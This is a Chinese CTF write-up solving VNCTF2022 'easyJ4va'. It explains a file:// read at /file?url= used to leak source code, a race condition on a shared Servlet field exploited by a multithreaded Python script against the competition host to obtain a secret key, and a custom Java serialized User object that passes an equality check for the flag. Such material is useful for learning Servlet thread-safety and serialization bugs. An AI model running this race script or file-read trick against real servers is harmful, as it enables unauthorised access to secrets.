从CTF题了解Servlet的线程安全问题
前言
VNCTF2022_easyJ4va 源于前几天打的VNCTF,这题自己尝试做了一下午,感觉确实可以,就拿来复盘一下,比赛做一下午没做出来,这里直接拿他读出来的源码进行复现吧,如果有想学习的师傅可以加我公告里的qq来拿源码试着做一下
正文
涉及知识点
个人感觉其中获取key的过程涉及到Servlet的线程安全问题,这里具体可以看一下Y4师傅的文章,给出文章地址 Servlet的线程安全问题,获取flag的过程涉及到java-Transient关键字的问题,这里给出文章地址 java-Transient关键字、Volatile关键字介绍和序列化、反序列化机制、单例类序列化
然后接下来具体看题吧
复现过程
打开环境,提示我们/file?,可以想到这里应该是让我们在/file路径下get传入一个参数,访问/file提示输入url,大概就是让我们访问/file?url=xxxx,这里有经验的师傅就大概可以猜到存在类似于SSRF或者读文件漏洞,这里直接上了file协议,读取出他的源码。这就一步带过了,因为太简单了。
读出来源代码以后我们直接进行审计,这就是一个Servlet对象,具体来看一下
//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by FernFlower decompiler)
//
package servlet;
import entity.User;
import java.io.IOException;
import java.util.Base64;
import java.util.Base64.Decoder;
import javax.servlet.ServletException;
import javax.servlet.ServletOutputStream;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import util.Secr3t;
import util.SerAndDe;
@WebServlet(
name = "HelloServlet",
urlPatterns = {"/evi1"}
)
public class HelloWorldServlet extends HttpServlet {
private volatile String name = "m4n_q1u_666";
private volatile String age = "666";
private volatile String height = "180";
User user;
public HelloWorldServlet() {
}
public void init() throws ServletException {
this.user = new User(this.name, this.age, this.height);
}
protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
String reqName = req.getParameter("name");
if (reqName != null) {
this.name = reqName;
}
if (Secr3t.check(this.name)) {
this.Response(resp, "no vnctf2022!");
} else {
if (Secr3t.check(this.name)) {
this.Response(resp, "The Key is " + Secr3t.getKey());
}
}
}
protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
String key = req.getParameter("key");
String text = req.getParameter("base64");
if (Secr3t.getKey().equals(key) && text != null) {
Decoder decoder = Base64.getDecoder();
byte[] textByte = decoder.decode(text);
User u = (User)SerAndDe.deserialize(textByte);
if (this.user.equals(u)) {
this.Response(resp, "Deserialize…… Flag is " + Secr3t.getFlag().toString());
}
} else {
this.Response(resp, "KeyError");
}
}
private void Response(HttpServletResponse resp, String outStr) throws IOException {
ServletOutputStream out = resp.getOutputStream();
out.write(outStr.getBytes());
out.flush();
out.close();
}
}
首先我们需要关注的是如何获取到Flag,因此我们可以看到在doPost()方法里面有这么一段代码
if (this.user.equals(u)) {
this.Response(resp, "Deserialize…… Flag is " + Secr3t.getFlag().toString());
}
要想要得到flag,必须要user和u相等,继续往上看,u是经过SerAndDe.deserialize(textByte);以后进行强制类型转换的结果,然后继续往上,可以看到一个if判断,需要拿到flag必须要先进入判断,必须要让如下代码结果为true
Secr3t.getKey().equals(key) && text != null
text是接收的一个base64参数,因此我们要让Secr3t.getKey()=key,下面给出Secr3t的源码,阅读了Secr3t的源码可以知道,我们需要先获取到一个key,key是要在HelloWorldServlet里的doGet()方法进行获取
//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by FernFlower decompiler)
//
package util;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import org.apache.commons.lang3.RandomStringUtils;
public class Secr3t {
private static final String Key = RandomStringUtils.randomAlphanumeric(32);
private static StringBuffer Flag;
private Secr3t() {
}
public static String getKey() {
return Key;
}
public static StringBuffer getFlag() {
Flag = new StringBuffer();
InputStream in = null;
try {
in = Runtime.getRuntime().exec("/readflag").getInputStream();
} catch (IOException var12) {
var12.printStackTrace();
}
BufferedReader read = new BufferedReader(new InputStreamReader(in));
try {
String line = null;
while((line = read.readLine()) != null) {
Flag.append(line + "\n");
}
} catch (IOException var13) {
var13.printStackTrace();
} finally {
try {
in.close();
read.close();
} catch (IOException var11) {
var11.printStackTrace();
System.out.println("Secr3t : io exception!");
}
}
return Flag;
}
public static boolean check(String checkStr) {
return "vnctf2022".equals(checkStr);
}
}
获取key的主要代码如下:
protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
String reqName = req.getParameter("name");
if (reqName != null) {
this.name = reqName;
}
if (Secr3t.check(this.name)) {
this.Response(resp, "no vnctf2022!");
} else {
if (Secr3t.check(this.name)) {
this.Response(resp, "The Key is " + Secr3t.getKey());
}
}
}
这里需要传入一个name参数,但是这里比较奇怪,又要让你Secr3t.check(this.name)结果为false,又要在else里的Secr3t.check(this.name)结果为true,这就有意思了,正常来说确实不可能,但是看了Y4师傅的那篇文章后可以知道多个客户端一起访问时,得到的是同一个Servlet,这就会造成别人对实例变量的修改会影响另外一个客户端。所以这里要拿到key,只需要用多线程来写,让他在一个线程为真的时候,另外一个线程为假,给出python脚本
import io
import requests
import threading
url = 'http://1.13.163.248:8081/evi1?name='
def white(session):
while event.isSet():
res = session.get(url=url+"vnctf2022").text
if 'Key' in res:
print(res)
event.clear()
def black(session):
while event.isSet():
res = session.get(url=url + "vnctf2021").text
if 'Key' in res:
print(res)
event.clear()
if __name__ == '__main__':
event = threading.Event()
event.set()
with requests.session() as session:
for i in range(1, 30):
threading.Thread(target=white, args=(session,)).start()
for i in range(1, 30):
threading.Thread(target=black, args=(session,)).start()
这里的话我当时跑出来的key是lDZHZ96itWAnjtaq9Xnqj2sfcn2SRqF1,图忘记保存了,这里拿到了key,接下来直接拿flag即可,获取flag的方法刚刚已经放出来了,就有个user可能不知道,user是类里面的一个User类的属性,User类如下
//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by FernFlower decompiler)
//
package entity;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.Serializable;
public class User implements Serializable {
private String name;
private String age;
private transient String height;
public User(String name, String age, String height) {
this.name = name;
this.age = age;
this.height = height;
}
public String getName() {
return this.name;
}
public void setName(String name) {
this.name = name;
}
public String getAge() {
return this.age;
}
public void setAge(String age) {
this.age = age;
}
public String getHeight() {
return this.height;
}
public void setHeight(String height) {
this.height = height;
}
private void readObject(ObjectInputStream s) throws IOException, ClassNotFoundException {
s.defaultReadObject();
this.height = (String)s.readObject();
}
public boolean equals(Object obj) {
if (obj == null) {
return false;
} else if (this == obj) {
return true;
} else if (obj instanceof User) {
User user = (User)obj;
return user.getAge().equals(this.age) && user.getHeight().equals(this.height) && user.getName().equals(this.name);
} else {
return false;
}
}
public String toString() {
return "User{name='" + this.name + '\'' + ", age='" + this.age + '\'' + ", height='" + this.height + '\'' + '}';
}
}
user会有初始值,我们需要让u=user,需要搞清楚u是怎么来的,再放一遍代码,是通过我们传入的base64的参数进行base64解码然后经过SerAndDe.deserialize方法之后强制转换成User类,这里的话我们大概可以知道这是个反序列化的函数,需要拿到他原始的值只需要序列化即可,这里题目自带了序列化的函数,我们只需要调用即可
if (Secr3t.getKey().equals(key) && text != null) {
Decoder decoder = Base64.getDecoder();
byte[] textByte = decoder.decode(text);
User u = (User)SerAndDe.deserialize(textByte);
给出SerAndDe的代码,其实这里影响不大,具体往下看
//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by FernFlower decompiler)
//
package util;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
public class SerAndDe {
private SerAndDe() {
}
public static byte[] serialize(Object object) {
ObjectOutputStream oos = null;
ByteArrayOutputStream bos = null;
Object var4;
try {
bos = new ByteArrayOutputStream();
oos = new ObjectOutputStream(bos);
oos.writeObject(object);
byte[] b = bos.toByteArray();
byte[] var16 = b;
return var16;
} catch (IOException var14) {
System.out.println("serialize Exception:" + var14.toString());
var4 = null;
} finally {
try {
if (oos != null) {
oos.close();
}
if (bos != null) {
bos.close();
}
} catch (IOException var13) {
System.out.println("io could not close:" + var13.toString());
}
}
return (byte[])var4;
}
public static Object deserialize(byte[] bytes) {
ByteArrayInputStream bais = null;
Object var3;
try {
bais = new ByteArrayInputStream(bytes);
ObjectInputStream ois = new ObjectInputStream(bais);
var3 = ois.readObject();
return var3;
} catch (IOException | ClassNotFoundException var13) {
System.out.println("deserialize Exception:" + var13.toString());
var3 = null;
} finally {
try {
if (bais != null) {
bais.close();
}
} catch (IOException var12) {
System.out.println("LogManage Could not serialize:" + var12.toString());
}
}
return var3;
}
}
我开始的时候是直接调用序列化方法,然后base64编码,但是确实没用,后面还是别的师傅和我说,有一个属性不可序列化,其中这个height加入了transient关键字,使他不能进行序列化,这里我们就直接看我上面放出的那篇文章吧,具体方法就是重写一个writeObject方法,手动重新赋值一个可序列化的属性给对象
手动在User类下面添加添加如下方法
private void writeObject(ObjectOutputStream s) throws IOException{
s.defaultWriteObject();
s.writeObject("180");
}
然后随便写个测试类,然后直接输出base64的结果,这里可以自己把环境运行起来
package VNCTF2022;
import entity.User;
import util.SerAndDe;
import java.util.Base64;
public class Test {
public static void main(String[] args) {
Base64.Decoder decoder = Base64.getDecoder();
User user = new User("m4n_q1u_666","666","180");
byte[] X= SerAndDe.serialize(user);
String text=Base64.getEncoder().encodeToString(X);
byte[] textByte=decoder.decode(text);
String Y = textByte.toString();
System.out.println(text);//base64
System.out.println("textByte: "+textByte);//解base之后的 序列化结果
String out = SerAndDe.deserialize(textByte).toString();//反序列化结果
System.out.println("反序列化得到的结果为: "+out);
}
}
即可得到我们所需要的结果,然后post传入即可,这里因为是自己搭建的环境,所以不能执行/readflag,这里只需要弹个计算器即可